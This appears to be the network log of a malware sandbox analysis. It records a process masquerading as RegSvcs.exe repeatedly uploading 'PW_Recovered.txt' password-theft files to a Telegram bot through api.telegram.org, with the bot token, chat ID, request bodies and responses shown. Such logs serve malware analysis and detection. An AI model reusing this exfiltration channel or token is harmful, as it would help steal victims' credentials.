                                                                          2024-09-19 10:23:20 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12787,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.561603149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:20 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce64c0780910e
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:20 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 34 63 30 37 38 30 39 31 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce64c0780910eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:21 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:21 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12788,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.561605149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:21 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dceaff00abf50c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:21 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 66 66 30 30 61 62 66 35 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dceaff00abf50cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:21 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:21 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:21 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12789,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.561609149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:25 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dceba7d0803f2e
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:25 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 61 37 64 30 38 30 33 66 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dceba7d0803f2eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:25 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12790,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.561608149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:25 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce6e7f102d275
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:25 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 65 37 66 31 30 32 64 32 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce6e7f102d275Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:25 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:25 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:25 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12791,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.2.561612149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:26 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dceaac99e5fcbf
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:26 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 61 61 63 39 39 65 35 66 63 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dceaac99e5fcbfContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:27 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:27 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:27 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12792,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.2.561614149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:28 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dcef90c1a97496
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:28 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 66 39 30 63 31 61 39 37 34 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dcef90c1a97496Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:29 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:29 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:29 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12793,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.2.561616149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:31 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dceb3e4c93a34e
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:31 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 62 33 65 34 63 39 33 61 33 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dceb3e4c93a34eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:31 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:31 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
